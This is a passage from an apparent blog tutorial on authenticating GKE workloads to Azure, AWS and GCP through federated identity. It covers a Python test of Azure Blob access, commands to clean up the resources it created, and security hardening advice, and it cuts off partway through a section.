      &lt;span class="na"&gt;mountPath&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;/var/run/secrets/azure/tokens&lt;/span&gt;
      &lt;span class="na"&gt;readOnly&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="kc"&gt;true&lt;/span&gt;
  &lt;span class="na"&gt;volumes&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;app-code&lt;/span&gt;
    &lt;span class="na"&gt;configMap&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
      &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;azure-test-code-gke&lt;/span&gt;
  &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;azure-token&lt;/span&gt;
    &lt;span class="na"&gt;projected&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
      &lt;span class="na"&gt;sources&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
      &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;serviceAccountToken&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
          &lt;span class="na"&gt;path&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;azure-identity-token&lt;/span&gt;
          &lt;span class="na"&gt;expirationSeconds&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="m"&gt;3600&lt;/span&gt;
          &lt;span class="na"&gt;audience&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;api://AzureADTokenExchange&lt;/span&gt;
&lt;span class="nn"&gt;---&lt;/span&gt;
&lt;span class="na"&gt;apiVersion&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;v1&lt;/span&gt;
&lt;span class="na"&gt;kind&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;ConfigMap&lt;/span&gt;
&lt;span class="na"&gt;metadata&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;azure-test-code-gke&lt;/span&gt;
  &lt;span class="na"&gt;namespace&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;default&lt;/span&gt;
&lt;span class="na"&gt;data&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;test_azure_from_gke.py&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="pi"&gt;|&lt;/span&gt;
    &lt;span class="s"&gt;# Code will be provided below&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;strong&gt;Test Code (Python):&lt;/strong&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight python"&gt;&lt;code&gt;&lt;span class="c1"&gt;# test_azure_from_gke.py
&lt;/span&gt;&lt;span class="kn"&gt;from&lt;/span&gt; &lt;span class="n"&gt;azure.identity&lt;/span&gt; &lt;span class="kn"&gt;import&lt;/span&gt; &lt;span class="n"&gt;DefaultAzureCredential&lt;/span&gt;
&lt;span class="kn"&gt;from&lt;/span&gt; &lt;span class="n"&gt;azure.storage.blob&lt;/span&gt; &lt;span class="kn"&gt;import&lt;/span&gt; &lt;span class="n"&gt;BlobServiceClient&lt;/span&gt;
&lt;span class="kn"&gt;import&lt;/span&gt; &lt;span class="n"&gt;os&lt;/span&gt;
&lt;span class="kn"&gt;import&lt;/span&gt; &lt;span class="n"&gt;sys&lt;/span&gt;

&lt;span class="k"&gt;def&lt;/span&gt; &lt;span class="nf"&gt;test_azure_access&lt;/span&gt;&lt;span class="p"&gt;():&lt;/span&gt;
    &lt;span class="sh"&gt;"""&lt;/span&gt;&lt;span class="s"&gt;Test Azure Blob Storage access from GKE using federated credentials&lt;/span&gt;&lt;span class="sh"&gt;"""&lt;/span&gt;
    &lt;span class="k"&gt;try&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
        &lt;span class="c1"&gt;# DefaultAzureCredential automatically detects federated identity
&lt;/span&gt;        &lt;span class="n"&gt;credential&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nc"&gt;DefaultAzureCredential&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt;

        &lt;span class="n"&gt;storage_account&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;os&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;environ&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;get&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="s"&gt;AZURE_STORAGE_ACCOUNT&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
        &lt;span class="n"&gt;account_url&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="sa"&gt;f&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;https://&lt;/span&gt;&lt;span class="si"&gt;{&lt;/span&gt;&lt;span class="n"&gt;storage_account&lt;/span&gt;&lt;span class="si"&gt;}&lt;/span&gt;&lt;span class="s"&gt;.blob.core.windows.net&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;

        &lt;span class="n"&gt;blob_service_client&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nc"&gt;BlobServiceClient&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;
            &lt;span class="n"&gt;account_url&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="n"&gt;account_url&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
            &lt;span class="n"&gt;credential&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="n"&gt;credential&lt;/span&gt;
        &lt;span class="p"&gt;)&lt;/span&gt;

        &lt;span class="c1"&gt;# List containers
&lt;/span&gt;        &lt;span class="n"&gt;containers&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nf"&gt;list&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;blob_service_client&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;list_containers&lt;/span&gt;&lt;span class="p"&gt;())&lt;/span&gt;

        &lt;span class="nf"&gt;print&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;✅ Azure Authentication successful!&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
        &lt;span class="nf"&gt;print&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="sa"&gt;f&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;Found &lt;/span&gt;&lt;span class="si"&gt;{&lt;/span&gt;&lt;span class="nf"&gt;len&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;containers&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;&lt;span class="si"&gt;}&lt;/span&gt;&lt;span class="s"&gt; containers:&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
        &lt;span class="k"&gt;for&lt;/span&gt; &lt;span class="n"&gt;container&lt;/span&gt; &lt;span class="ow"&gt;in&lt;/span&gt; &lt;span class="n"&gt;containers&lt;/span&gt;&lt;span class="p"&gt;[:&lt;/span&gt;&lt;span class="mi"&gt;5&lt;/span&gt;&lt;span class="p"&gt;]:&lt;/span&gt;
            &lt;span class="nf"&gt;print&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="sa"&gt;f&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;  - &lt;/span&gt;&lt;span class="si"&gt;{&lt;/span&gt;&lt;span class="n"&gt;container&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;name&lt;/span&gt;&lt;span class="si"&gt;}&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;

        &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="bp"&gt;True&lt;/span&gt;
    &lt;span class="k"&gt;except&lt;/span&gt; &lt;span class="nb"&gt;Exception&lt;/span&gt; &lt;span class="k"&gt;as&lt;/span&gt; &lt;span class="n"&gt;e&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
        &lt;span class="nf"&gt;print&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="sa"&gt;f&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;❌ Azure Authentication failed: &lt;/span&gt;&lt;span class="si"&gt;{&lt;/span&gt;&lt;span class="nf"&gt;str&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;e&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;&lt;span class="si"&gt;}&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
        &lt;span class="kn"&gt;import&lt;/span&gt; &lt;span class="n"&gt;traceback&lt;/span&gt;
        &lt;span class="n"&gt;traceback&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;print_exc&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt;
        &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="bp"&gt;False&lt;/span&gt;

&lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="n"&gt;__name__&lt;/span&gt; &lt;span class="o"&gt;==&lt;/span&gt; &lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;__main__&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
    &lt;span class="n"&gt;success&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nf"&gt;test_azure_access&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt;
    &lt;span class="n"&gt;sys&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;exit&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="mi"&gt;0&lt;/span&gt; &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="n"&gt;success&lt;/span&gt; &lt;span class="k"&gt;else&lt;/span&gt; &lt;span class="mi"&gt;1&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;strong&gt;Success Logs:&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;If you see logs like below for the pod &lt;code&gt;kubectl logs -f -n default gke-azure-test&lt;/code&gt;, it means the GKE to Azure Authentication worked.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;✅ Azure Authentication successful!
Found 1 containers:
  - test-container
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;






&lt;h3&gt;
  
  
  Scenario 3 Cleanup
&lt;/h3&gt;

&lt;p&gt;After testing Scenario 3 (GKE cross-cloud authentication), clean up the resources:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# ============================================&lt;/span&gt;
&lt;span class="c"&gt;# GCP Resources Cleanup&lt;/span&gt;
&lt;span class="c"&gt;# ============================================&lt;/span&gt;

&lt;span class="nv"&gt;PROJECT_ID&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="si"&gt;$(&lt;/span&gt;gcloud config get-value project&lt;span class="si"&gt;)&lt;/span&gt;
&lt;span class="nv"&gt;GSA_EMAIL&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s2"&gt;"gke-cross-cloud-sa@&lt;/span&gt;&lt;span class="k"&gt;${&lt;/span&gt;&lt;span class="nv"&gt;PROJECT_ID&lt;/span&gt;&lt;span class="k"&gt;}&lt;/span&gt;&lt;span class="s2"&gt;.iam.gserviceaccount.com"&lt;/span&gt;

&lt;span class="c"&gt;# Remove IAM policy binding&lt;/span&gt;
gcloud iam service-accounts remove-iam-policy-binding &lt;span class="k"&gt;${&lt;/span&gt;&lt;span class="nv"&gt;GSA_EMAIL&lt;/span&gt;&lt;span class="k"&gt;}&lt;/span&gt; &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--role&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;roles/iam.workloadIdentityUser &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--member&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s2"&gt;"serviceAccount:&lt;/span&gt;&lt;span class="k"&gt;${&lt;/span&gt;&lt;span class="nv"&gt;PROJECT_ID&lt;/span&gt;&lt;span class="k"&gt;}&lt;/span&gt;&lt;span class="s2"&gt;.svc.id.goog[default/gke-cross-cloud-sa]"&lt;/span&gt; &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--quiet&lt;/span&gt;

&lt;span class="c"&gt;# Delete GCS bucket&lt;/span&gt;
gcloud storage &lt;span class="nb"&gt;rm&lt;/span&gt; &lt;span class="nt"&gt;-r&lt;/span&gt; gs://gke-cross-cloud

&lt;span class="c"&gt;# Remove project-level permissions&lt;/span&gt;
gcloud projects remove-iam-policy-binding &lt;span class="k"&gt;${&lt;/span&gt;&lt;span class="nv"&gt;PROJECT_ID&lt;/span&gt;&lt;span class="k"&gt;}&lt;/span&gt; &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--member&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s2"&gt;"serviceAccount:&lt;/span&gt;&lt;span class="k"&gt;${&lt;/span&gt;&lt;span class="nv"&gt;GSA_EMAIL&lt;/span&gt;&lt;span class="k"&gt;}&lt;/span&gt;&lt;span class="s2"&gt;"&lt;/span&gt; &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--role&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s2"&gt;"roles/storage.admin"&lt;/span&gt;

&lt;span class="c"&gt;# Delete GCP service account&lt;/span&gt;
gcloud iam service-accounts delete &lt;span class="k"&gt;${&lt;/span&gt;&lt;span class="nv"&gt;GSA_EMAIL&lt;/span&gt;&lt;span class="k"&gt;}&lt;/span&gt; &lt;span class="nt"&gt;--quiet&lt;/span&gt;

&lt;span class="c"&gt;# ============================================&lt;/span&gt;
&lt;span class="c"&gt;# AWS Resources Cleanup&lt;/span&gt;
&lt;span class="c"&gt;# ============================================&lt;/span&gt;

&lt;span class="c"&gt;# Get OIDC provider info&lt;/span&gt;
&lt;span class="nv"&gt;PROJECT_ID&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="si"&gt;$(&lt;/span&gt;gcloud config get-value project&lt;span class="si"&gt;)&lt;/span&gt;
&lt;span class="nv"&gt;CLUSTER_LOCATION&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s2"&gt;"us-central1"&lt;/span&gt;  &lt;span class="c"&gt;# Update to your cluster location&lt;/span&gt;

&lt;span class="nv"&gt;OIDC_ISSUER&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="si"&gt;$(&lt;/span&gt;curl &lt;span class="nt"&gt;-s&lt;/span&gt; https://container.googleapis.com/v1/projects/YOUR_PROJECT_ID/locations/us-central1/clusters/my-gke-cluster/.well-known/openid-configuration | jq &lt;span class="nt"&gt;-r&lt;/span&gt; .issuer&lt;span class="si"&gt;)&lt;/span&gt;
&lt;span class="nv"&gt;OIDC_PROVIDER&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="si"&gt;$(&lt;/span&gt;&lt;span class="nb"&gt;echo&lt;/span&gt; &lt;span class="nv"&gt;$OIDC_ISSUER&lt;/span&gt; | &lt;span class="nb"&gt;sed&lt;/span&gt; &lt;span class="nt"&gt;-e&lt;/span&gt; &lt;span class="s2"&gt;"s/^https:&lt;/span&gt;&lt;span class="se"&gt;\/\/&lt;/span&gt;&lt;span class="s2"&gt;//"&lt;/span&gt;&lt;span class="si"&gt;)&lt;/span&gt;

&lt;span class="c"&gt;# Delete IAM role policy attachments&lt;/span&gt;
aws iam detach-role-policy &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--role-name&lt;/span&gt; gke-to-aws-role &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--policy-arn&lt;/span&gt; arn:aws:iam::aws:policy/AmazonS3ReadOnlyAccess

&lt;span class="c"&gt;# Delete IAM role&lt;/span&gt;
aws iam delete-role &lt;span class="nt"&gt;--role-name&lt;/span&gt; gke-to-aws-role

&lt;span class="c"&gt;# Delete OIDC provider&lt;/span&gt;
&lt;span class="nv"&gt;ACCOUNT_ID&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="si"&gt;$(&lt;/span&gt;aws sts get-caller-identity &lt;span class="nt"&gt;--query&lt;/span&gt; Account &lt;span class="nt"&gt;--output&lt;/span&gt; text&lt;span class="si"&gt;)&lt;/span&gt;
aws iam delete-open-id-connect-provider &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--open-id-connect-provider-arn&lt;/span&gt; &lt;span class="s2"&gt;"arn:aws:iam::&lt;/span&gt;&lt;span class="k"&gt;${&lt;/span&gt;&lt;span class="nv"&gt;ACCOUNT_ID&lt;/span&gt;&lt;span class="k"&gt;}&lt;/span&gt;&lt;span class="s2"&gt;:oidc-provider/&lt;/span&gt;&lt;span class="k"&gt;${&lt;/span&gt;&lt;span class="nv"&gt;OIDC_PROVIDER&lt;/span&gt;&lt;span class="k"&gt;}&lt;/span&gt;&lt;span class="s2"&gt;"&lt;/span&gt;

&lt;span class="c"&gt;# ============================================&lt;/span&gt;
&lt;span class="c"&gt;# Azure Resources Cleanup&lt;/span&gt;
&lt;span class="c"&gt;# ============================================&lt;/span&gt;

&lt;span class="c"&gt;# Get App ID&lt;/span&gt;
&lt;span class="nv"&gt;APP_ID&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="si"&gt;$(&lt;/span&gt;az ad app list &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--display-name&lt;/span&gt; gke-to-azure-app &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--query&lt;/span&gt; &lt;span class="s2"&gt;"[0].appId"&lt;/span&gt; &lt;span class="nt"&gt;-o&lt;/span&gt; tsv&lt;span class="si"&gt;)&lt;/span&gt;

&lt;span class="c"&gt;# Delete role assignments&lt;/span&gt;
&lt;span class="nv"&gt;SUBSCRIPTION_ID&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="si"&gt;$(&lt;/span&gt;az account show &lt;span class="nt"&gt;--query&lt;/span&gt; &lt;span class="nb"&gt;id&lt;/span&gt; &lt;span class="nt"&gt;-o&lt;/span&gt; tsv&lt;span class="si"&gt;)&lt;/span&gt;
az role assignment delete &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--assignee&lt;/span&gt; &lt;span class="nv"&gt;$APP_ID&lt;/span&gt; &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--scope&lt;/span&gt; &lt;span class="s2"&gt;"/subscriptions/&lt;/span&gt;&lt;span class="nv"&gt;$SUBSCRIPTION_ID&lt;/span&gt;&lt;span class="s2"&gt;"&lt;/span&gt;

&lt;span class="c"&gt;# Delete federated credentials&lt;/span&gt;
az ad app federated-credential delete &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--id&lt;/span&gt; &lt;span class="nv"&gt;$APP_ID&lt;/span&gt; &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--federated-credential-id&lt;/span&gt; gke-federated-identity

&lt;span class="c"&gt;# Delete service principal&lt;/span&gt;
az ad sp delete &lt;span class="nt"&gt;--id&lt;/span&gt; &lt;span class="nv"&gt;$APP_ID&lt;/span&gt;

&lt;span class="c"&gt;# Delete app registration&lt;/span&gt;
az ad app delete &lt;span class="nt"&gt;--id&lt;/span&gt; &lt;span class="nv"&gt;$APP_ID&lt;/span&gt;

&lt;span class="c"&gt;# Delete resource group&lt;/span&gt;
az group delete &lt;span class="nt"&gt;--name&lt;/span&gt; gke-cross-cloud &lt;span class="nt"&gt;--subscription&lt;/span&gt; &lt;span class="nv"&gt;$SUBSCRIPTION_ID&lt;/span&gt; &lt;span class="nt"&gt;--yes&lt;/span&gt; &lt;span class="nt"&gt;--no-wait&lt;/span&gt;

&lt;span class="c"&gt;# ============================================&lt;/span&gt;
&lt;span class="c"&gt;# Kubernetes Resources Cleanup&lt;/span&gt;
&lt;span class="c"&gt;# ============================================&lt;/span&gt;

&lt;span class="c"&gt;# Delete test pods&lt;/span&gt;
kubectl delete pod gke-gcp-test &lt;span class="nt"&gt;--force&lt;/span&gt; &lt;span class="nt"&gt;--ignore-not-found&lt;/span&gt;
kubectl delete pod gke-aws-test &lt;span class="nt"&gt;--force&lt;/span&gt; &lt;span class="nt"&gt;--ignore-not-found&lt;/span&gt;
kubectl delete pod gke-azure-test &lt;span class="nt"&gt;--force&lt;/span&gt; &lt;span class="nt"&gt;--ignore-not-found&lt;/span&gt;

&lt;span class="c"&gt;# Delete ConfigMaps&lt;/span&gt;
kubectl delete configmap gcp-test-code-gke &lt;span class="nt"&gt;--ignore-not-found&lt;/span&gt;
kubectl delete configmap aws-test-code-gke &lt;span class="nt"&gt;--ignore-not-found&lt;/span&gt;
kubectl delete configmap azure-test-code-gke &lt;span class="nt"&gt;--ignore-not-found&lt;/span&gt;

&lt;span class="c"&gt;# Delete service account&lt;/span&gt;
kubectl delete serviceaccount gke-cross-cloud-sa &lt;span class="nt"&gt;--ignore-not-found&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;






&lt;h2&gt;
  
  
  Security Best Practices
&lt;/h2&gt;

&lt;h3&gt;
  
  
  1. Principle of Least Privilege
&lt;/h3&gt;

&lt;ul&gt;
&lt;li&gt;Grant only the minimum permissions required&lt;/li&gt;
&lt;li&gt;Use resource-specific policies instead of broad access&lt;/li&gt;
&lt;li&gt;Regularly audit and review permissions&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;Example:&lt;/strong&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# ❌ BAD: Subscription-wide access&lt;/span&gt;
az role assignment create &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--assignee&lt;/span&gt; &lt;span class="nv"&gt;$APP_ID&lt;/span&gt; &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--role&lt;/span&gt; &lt;span class="s2"&gt;"Storage Blob Data Reader"&lt;/span&gt; &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--scope&lt;/span&gt; &lt;span class="s2"&gt;"/subscriptions/&lt;/span&gt;&lt;span class="nv"&gt;$SUBSCRIPTION_ID&lt;/span&gt;&lt;span class="s2"&gt;"&lt;/span&gt;

&lt;span class="c"&gt;# ✅ GOOD: Resource-specific access&lt;/span&gt;
az role assignment create &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--assignee&lt;/span&gt; &lt;span class="nv"&gt;$APP_ID&lt;/span&gt; &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--role&lt;/span&gt; &lt;span class="s2"&gt;"Storage Blob Data Reader"&lt;/span&gt; &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--scope&lt;/span&gt; &lt;span class="nv"&gt;$STORAGE_ACCOUNT_ID&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  2. Namespace Isolation
&lt;/h3&gt;

&lt;ul&gt;
&lt;li&gt;Use different service accounts per namespace&lt;/li&gt;
&lt;li&gt;Implement namespace-level RBAC&lt;/li&gt;
&lt;li&gt;Separate production and development workloads&lt;/li&gt;
&lt;/ul&gt;

&lt;h3&gt;
  
  
  3. Token Lifetime Management
&lt;/h3&gt;

&lt;ul&gt;
&lt;li&gt;Use short-lived tokens (default is usually 1 hour)&lt;/li&gt;
&lt;li&gt;Enable automatic token rotation&lt;/li&gt;
&lt;li&gt;Monitor token usage and expiration&lt;/li&gt;
&lt;/ul&gt;

&lt;h3&gt;
  
  
  4. Audit Logging
&lt;/h3&gt;

&lt;ul&gt;
&lt;li&gt;Enable cloud provider audit logs&lt;/li&gt;
&lt;li&gt;Monitor authentication attempts&lt;/li&gt;
&lt;li&gt;Set up alerts for suspicious activity
&lt;/li&gt;
&lt;/ul&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight yaml"&gt;&lt;code&gt;&lt;span class="c1"&gt;# Example: Add labels for better tracking&lt;/span&gt;
&lt;span class="na"&gt;apiVersion&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;v1&lt;/span&gt;
&lt;span class="na"&gt;kind&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;ServiceAccount&lt;/span&gt;
&lt;span class="na"&gt;metadata&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;cross-cloud-sa&lt;/span&gt;
  &lt;span class="na"&gt;namespace&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;production&lt;/span&gt;
  &lt;span class="na"&gt;labels&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
    &lt;span class="na"&gt;app&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;my-app&lt;/span&gt;
    &lt;span class="na"&gt;environment&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;production&lt;/span&gt;
    &lt;span class="na"&gt;team&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;platform&lt;/span&gt;
  &lt;span class="na"&gt;annotations&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
    &lt;span class="na"&gt;purpose&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="s"&gt;Cross-cloud&lt;/span&gt;&lt;span class="nv"&gt; &lt;/span&gt;&lt;span class="s"&gt;authentication&lt;/span&gt;&lt;span class="nv"&gt; &lt;/span&gt;&lt;span class="s"&gt;for&lt;/span&gt;&lt;span class="nv"&gt; &lt;/span&gt;&lt;span class="s"&gt;data&lt;/span&gt;&lt;span class="nv"&gt; &lt;/span&gt;&lt;span class="s"&gt;pipeline"&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  5. Network Security
&lt;/h3&gt;

&lt;ul&gt;
&lt;li&gt;Use private endpoints where possible&lt;/li&gt;
&lt;li&gt;Implement egress filtering&lt;/li&gt;
&lt;li&gt;Use VPC/VNet peering for enhanced security&lt;/li&gt;
&lt;/ul&gt;

&lt;h3&gt;
  
  
  6. Credential Scanning
&lt;/h3&gt;

&lt;ul&gt;
&lt;li&gt;Never commit workload identity configs to git&lt;/li&gt;
&lt;li&gt;Use tools like git-secrets, gitleaks&lt;/li&gt;
&lt;li&gt;Implement pre-commit hooks&lt;/li&gt;
&lt;/ul&gt;




&lt;h2&gt;
  
  
  Production Hardening
&lt;/h2&gt;

&lt;p&gt;For production deployments, implement these additional security measures:&lt;/p&gt;

&lt;h3&gt;
  
  
  1. Strict Audience Claims
&lt;/h3&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# ❌ Avoid wildcards or non-standard audiences&lt;/span&gt;
